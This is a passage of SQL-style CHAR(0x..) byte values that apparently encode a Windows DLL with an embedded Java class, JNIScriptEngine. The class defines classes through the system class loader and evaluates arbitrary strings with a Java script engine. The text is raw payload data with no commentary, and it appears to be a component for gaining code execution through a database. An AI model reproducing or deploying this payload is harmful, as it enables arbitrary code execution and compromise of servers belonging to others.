R(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa0),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb4),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xce),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe2),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xfe),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x44),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x7a),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xa6),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xdc),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf2),CHAR(0x3c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x14),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x68),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x74),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x82),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x94),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xae),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd0),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xec),CHAR(0x3d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x3e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1d),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xd8),CHAR(0x1d),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x65),CHAR(0x72),CHAR(0x3b),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x53),CHAR(0x79),CHAR(0x73),CHAR(0x74),CHAR(0x65),CHAR(0x6d),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x4c),CHAR(0x6f),CHAR(0x61),CHAR(0x64),CHAR(0x65),CHAR(0x72),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x5b),CHAR(0x42),CHAR(0x49),CHAR(0x49),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x3b),CHAR(0x00),CHAR(0x64),CHAR(0x65),CHAR(0x66),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x43),CHAR(0x6c),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xca),CHAR(0xfe),CHAR(0xba),CHAR(0xbe),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x34),CHAR(0x00),CHAR(0x2e),CHAR(0x0a),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x03),CHAR(0x07),CHAR(0x00),CHAR(0x04),CHAR(0x0c),CHAR(0x00),CHAR(0x05),CHAR(0x00),CHAR(0x06),CHAR(0x01),CHAR(0x00),CHAR(0x10),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x4f),CHAR(0x62),CHAR(0x6a),CHAR(0x65),CHAR(0x63),CHAR(0x74),CHAR(0x01),CHAR(0x00),CHAR(0x06),CHAR(0x3c),CHAR(0x69),CHAR(0x6e),CHAR(0x69),CHAR(0x74),CHAR(0x3e),CHAR(0x01),CHAR(0x00),CHAR(0x03),CHAR(0x28),CHAR(0x29),CHAR(0x56),CHAR(0x07),CHAR(0x00),CHAR(0x08),CHAR(0x01),CHAR(0x00),CHAR(0x20),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x4d),CHAR(0x61),CHAR(0x6e),CHAR(0x61),CHAR(0x67),CHAR(0x65),CHAR(0x72),CHAR(0x0a),CHAR(0x00),CHAR(0x07),CHAR(0x00),CHAR(0x03),CHAR(0x0a),CHAR(0x00),CHAR(0x07),CHAR(0x00),CHAR(0x0b),CHAR(0x0c),CHAR(0x00),CHAR(0x0c),CHAR(0x00),CHAR(0x0d),CHAR(0x01),CHAR(0x00),CHAR(0x12),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x46),CHAR(0x61),CHAR(0x63),CHAR(0x74),CHAR(0x6f),CHAR(0x72),CHAR(0x69),CHAR(0x65),CHAR(0x73),CHAR(0x01),CHAR(0x00),CHAR(0x12),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x75),CHAR(0x74),CHAR(0x69),CHAR(0x6c),CHAR(0x2f),CHAR(0x4c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x3b),CHAR(0x0b),CHAR(0x00),CHAR(0x0f),CHAR(0x00),CHAR(0x10),CHAR(0x07),CHAR(0x00),CHAR(0x11),CHAR(0x0c),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x13),CHAR(0x01),CHAR(0x00),CHAR(0x0e),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x75),CHAR(0x74),CHAR(0x69),CHAR(0x6c),CHAR(0x2f),CHAR(0x4c),CHAR(0x69),CHAR(0x73),CHAR(0x74),CHAR(0x01),CHAR(0x00),CHAR(0x03),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x01),CHAR(0x00),CHAR(0x15),CHAR(0x28),CHAR(0x49),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x4f),CHAR(0x62),CHAR(0x6a),CHAR(0x65),CHAR(0x63),CHAR(0x74),CHAR(0x3b),CHAR(0x07),CHAR(0x00),CHAR(0x15),CHAR(0x01),CHAR(0x00),CHAR(0x20),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x46),CHAR(0x61),CHAR(0x63),CHAR(0x74),CHAR(0x6f),CHAR(0x72),CHAR(0x79),CHAR(0x0b),CHAR(0x00),CHAR(0x14),CHAR(0x00),CHAR(0x17),CHAR(0x0c),CHAR(0x00),CHAR(0x18),CHAR(0x00),CHAR(0x19),CHAR(0x01),CHAR(0x00),CHAR(0x0f),CHAR(0x67),CHAR(0x65),CHAR(0x74),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x1d),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x3b),CHAR(0x0b),CHAR(0x00),CHAR(0x1b),CHAR(0x00),CHAR(0x1c),CHAR(0x07),CHAR(0x00),CHAR(0x1d),CHAR(0x0c),CHAR(0x00),CHAR(0x1e),CHAR(0x00),CHAR(0x1f),CHAR(0x01),CHAR(0x00),CHAR(0x19),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x78),CHAR(0x2f),CHAR(0x73),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x2f),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x65),CHAR(0x76),CHAR(0x61),CHAR(0x6c),CHAR(0x01),CHAR(0x00),CHAR(0x26),CHAR(0x28),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x4f),CHAR(0x62),CHAR(0x6a),CHAR(0x65),CHAR(0x63),CHAR(0x74),CHAR(0x3b),CHAR(0x0a),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x21),CHAR(0x0c),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x00),CHAR(0x23),CHAR(0x01),CHAR(0x00),CHAR(0x08),CHAR(0x74),CHAR(0x6f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x01),CHAR(0x00),CHAR(0x14),CHAR(0x28),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x07),CHAR(0x00),CHAR(0x25),CHAR(0x01),CHAR(0x00),CHAR(0x0f),CHAR(0x4a),CHAR(0x4e),CHAR(0x49),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x04),CHAR(0x43),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x0f),CHAR(0x4c),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x4e),CHAR(0x75),CHAR(0x6d),CHAR(0x62),CHAR(0x65),CHAR(0x72),CHAR(0x54),CHAR(0x61),CHAR(0x62),CHAR(0x6c),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x26),CHAR(0x28),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x29),CHAR(0x4c),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x53),CHAR(0x74),CHAR(0x72),CHAR(0x69),CHAR(0x6e),CHAR(0x67),CHAR(0x3b),CHAR(0x01),CHAR(0x00),CHAR(0x0a),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x73),CHAR(0x07),CHAR(0x00),CHAR(0x2b),CHAR(0x01),CHAR(0x00),CHAR(0x13),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x2f),CHAR(0x6c),CHAR(0x61),CHAR(0x6e),CHAR(0x67),CHAR(0x2f),CHAR(0x45),CHAR(0x78),CHAR(0x63),CHAR(0x65),CHAR(0x70),CHAR(0x74),CHAR(0x69),CHAR(0x6f),CHAR(0x6e),CHAR(0x01),CHAR(0x00),CHAR(0x0a),CHAR(0x53),CHAR(0x6f),CHAR(0x75),CHAR(0x72),CHAR(0x63),CHAR(0x65),CHAR(0x46),CHAR(0x69),CHAR(0x6c),CHAR(0x65),CHAR(0x01),CHAR(0x00),CHAR(0x14),CHAR(0x4a),CHAR(0x4e),CHAR(0x49),CHAR(0x53),CHAR(0x63),CHAR(0x72),CHAR(0x69),CHAR(0x70),CHAR(0x74),CHAR(0x45),CHAR(0x6e),CHAR(0x67),CHAR(0x69),CHAR(0x6e),CHAR(0x65),CHAR(0x2e),CHAR(0x6a),CHAR(0x61),CHAR(0x76),CHAR(0x61),CHAR(0x00),CHAR(0x21),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x05),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x26),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1d),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x05),CHAR(0x2a),CHAR(0xb7),CHAR(0x00),CHAR(0x01),CHAR(0xb1),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x09),CHAR(0x00),CHAR(0x1e),CHAR(0x00),CHAR(0x28),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x26),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x3a),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0xbb),CHAR(0x00),CHAR(0x07),CHAR(0x59),CHAR(0xb7),CHAR(0x00),CHAR(0x09),CHAR(0xb6),CHAR(0x00),CHAR(0x0a),CHAR(0x03),CHAR(0xb9),CHAR(0x00),CHAR(0x0e),CHAR(0x02),CHAR(0x00),CHAR(0xc0),CHAR(0x00),CHAR(0x14),CHAR(0xb9),CHAR(0x00),CHAR(0x16),CHAR(0x01),CHAR(0x00),CHAR(0x2a),CHAR(0xb9),CHAR(0x00),CHAR(0x1a),CHAR(0x02),CHAR(0x00),CHAR(0xb6),CHAR(0x00),CHAR(0x20),CHAR(0xb0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x27),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x29),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x2a),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x2c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x40),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x40),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x18),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x36),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x30),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x08),CHAR(0x40),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x30),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf8),CHAR(0x30),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x